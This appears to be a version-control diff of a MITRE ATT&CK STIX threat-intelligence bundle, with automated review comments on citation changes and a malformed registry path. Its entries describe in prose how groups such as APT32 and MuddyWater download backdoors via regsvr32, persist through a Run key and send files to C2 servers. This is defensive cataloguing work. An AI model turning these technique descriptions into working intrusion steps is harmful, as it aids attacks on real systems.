{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -30737,7 +31768,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.083Z",
+ "modified": "2020-04-16T19:41:40.396Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -30992,16 +32023,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.008Z",
+ "modified": "2020-05-14T15:14:33.568Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
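Review bot: The rewritten `DustySky` external reference keeps only `description` and drops the `url` that pointed at the ClearSky PDF, so `(Citation: DustySky)` in this relationship can no longer be resolved to a source by consumers of the bundle. That is still valid STIX 2.0 (an external reference needs only one of `url`, `external_id` or `description`), but it is a regression for anyone trying to verify the claim. If the original link is dead, the usual fix is an archived copy rather than deleting the field; if this file is copied verbatim from upstream, the fix belongs upstream and is only worth recording here. The same drop occurs in the later DustySky hunk for `intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411`.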
@@ -31580,21 +32610,21 @@
],
"external_references": [
{
- "source_name": "Cymmetria Patchwork",
+ "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
"description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.",
- "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+ "source_name": "Cymmetria Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.580Z",
+ "modified": "2020-06-29T15:13:05.439Z",
"created": "2017-05-31T21:33:27.076Z"
},
{
@@ -31702,32 +32732,32 @@
{
"id": "relationship--dfcc52d8-4664-48c4-9e35-2be2cd649d93",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) ",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
+ "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
+ "source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 May 2017",
"description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.",
- "source_name": "FireEye APT32 May 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
},
{
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
"description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
"source_name": "Cybereason Cobalt Kitty 2017"
- },
- {
- "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
- "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
- "source_name": "ESET OceanLotus Mar 2019"
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.694Z",
+ "modified": "2020-06-19T20:04:12.233Z",
"created": "2017-12-14T16:46:06.044Z"
},
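Review bot: The new `description` string ends with a trailing space after `(Citation: Cybereason Cobalt Kitty 2017)`, which is harmless to a JSON parser but will round-trip into rendered pages and every future diff of this line; if the file is merged by hand rather than copied verbatim, strip it so the value ends `...(Citation: Cybereason Cobalt Kitty 2017)"`. The reorder also moves all three citations after the second sentence, so the ESET reference now reads as supporting the scheduled-task/COM-scriptlet claim it was not previously attached to; that is upstream's wording, but worth a glance if citation provenance matters for this repository's mappings.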
{
@@ -31850,7 +32880,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.224Z",
+ "modified": "2020-06-19T20:07:09.769Z",
"created": "2017-05-31T21:33:27.031Z"
},
{
@@ -31935,7 +32965,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -31944,7 +32974,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.102Z",
+ "modified": "2020-04-16T19:41:40.432Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -32067,7 +33097,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47",
"type": "relationship",
- "modified": "2019-07-25T11:12:34.468Z",
+ "modified": "2020-07-14T19:39:44.767Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -32141,7 +33171,7 @@
"external_references": [
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
}
],
@@ -32149,7 +33179,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
"type": "relationship",
- "modified": "2020-03-30T01:02:25.918Z",
+ "modified": "2020-05-12T22:13:16.666Z",
"created": "2017-05-31T21:33:27.081Z"
},
{
@@ -32948,7 +33978,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef",
"type": "relationship",
- "modified": "2019-07-24T18:09:33.160Z",
+ "modified": "2020-07-14T19:44:50.970Z",
"created": "2017-05-31T21:33:27.027Z"
},
{
@@ -33007,12 +34037,12 @@
"url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF"
}
],
- "source_ref": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--101867a2-149c-4088-a90f-7af4b86e5013",
@@ -33117,12 +34147,12 @@
"url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/"
}
],
- "source_ref": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--a06bd922-b887-4134-81cb-1e4180cf5a5a",
@@ -33133,16 +34163,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
"relationship_type": "uses",
"target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.006Z",
+ "modified": "2020-05-14T14:30:09.423Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
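Review bot: The `DustySky` external reference on the new side loses its `url` (the ClearSky PDF link on the removed line) and keeps only `description`, so the citation in this relationship no longer points anywhere retrievable. It remains valid STIX 2.0, but if the link was removed because it is dead, an archived copy would preserve verifiability; if this bundle is vendored verbatim from MITRE, the change should be raised upstream rather than patched here.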
@@ -33161,15 +34190,20 @@
{
"id": "relationship--40032198-f003-4171-92a0-faf038f62a0b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the whoami command on the victim's machine.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the whoami command on the victim's machine. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to collect the username on the victim's machine. (Citation: FireEye APT32 April 2020)(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
+ },
+ {
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
@@ -33181,13 +34215,13 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.723Z",
+ "modified": "2020-06-19T20:04:12.207Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--4c6aea43-27ba-4e6a-8907-e5db364a145b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) malware xxmm contains a UAC bypass tool for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -33196,13 +34230,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.075Z",
+ "modified": "2020-06-24T01:27:31.914Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -33261,16 +34300,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "relationship",
- "modified": "2020-03-16T15:28:54.593Z",
+ "modified": "2020-06-02T16:14:00.337Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -33318,36 +34357,36 @@
{
"id": "relationship--d361058d-a11b-470d-bed8-44bfd8e50393",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer transfers collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can transfer collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.603Z",
+ "modified": "2020-06-22T17:54:15.519Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
"id": "relationship--55d44c4e-c864-4e6f-ac33-62f13cd08f0e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
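Review bot: The Run key path in the new `description`, `KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding`, is presumably missing its hive prefix (`HKCU\...`); it is carried over unchanged from the old line rather than introduced by this commit. Anyone lifting that value into a registry detection rule would get a path that never matches, so it is worth correcting to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding` or filing it upstream if this bundle is copied verbatim. The added `Reaqta MuddyWater November 2017` citation is consistent with the new reference entry in the following hunk.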
@@ -33355,16 +34394,21 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.374Z",
+ "modified": "2020-05-18T19:04:37.811Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -33490,14 +34534,14 @@
"target_ref": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.319Z",
+ "modified": "2020-04-16T19:41:40.504Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34007,7 +35051,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
"type": "relationship",
- "modified": "2020-03-29T23:32:53.631Z",
+ "modified": "2020-04-29T14:37:59.726Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34074,7 +35118,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -34083,7 +35127,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.117Z",
+ "modified": "2020-04-16T19:41:40.518Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34138,27 +35182,6 @@
"modified": "2020-03-25T16:00:35.796Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--b3d63cea-ad1c-47a5-b9e5-09920bae0537",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
- "external_references": [
- {
- "source_name": "Check Point Rocket Kitten",
- "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
- "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
- }
- ],
- "description": "(Citation: Check Point Rocket Kitten)",
- "type": "relationship",
- "modified": "2020-03-18T13:34:21.388Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--e1d0ec8e-0970-4737-9605-1cf8a3ba1371",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -34189,7 +35212,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -34198,7 +35221,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:17:35.708Z",
+ "modified": "2020-04-16T19:41:40.490Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34215,42 +35238,47 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--2305a634-b226-4da2-a766-bec5458f9447",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.376Z",
+ "modified": "2020-05-18T17:29:30.990Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -34485,12 +35513,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--8d7c04bb-ed5b-4339-a115-62089ea6711b",
@@ -34502,7 +35530,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.974Z",
+ "modified": "2020-07-14T19:38:14.416Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -34711,7 +35739,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.452Z",
+ "modified": "2020-07-06T18:49:35.880Z",
